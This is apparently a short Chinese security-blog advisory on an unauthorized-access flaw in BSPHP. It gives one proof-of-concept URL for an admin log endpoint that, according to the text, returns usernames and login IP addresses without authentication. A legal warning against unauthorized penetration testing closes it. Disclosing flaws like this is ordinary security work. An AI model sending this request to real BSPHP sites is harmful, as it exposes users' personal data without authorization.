BSPHP存在未授权访问

漏洞危害

该处泄漏的⽤户名和用户登陆 IP

漏洞POC

http://127.0.0.1/admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&

直接进行访问即可获得如下数据

d2b5ca33bd171011

 

温馨提示:一切未经授权的渗透测试行为均为违法行为。
© 版权声明
THE END
喜欢就支持一下吧
点赞12 分享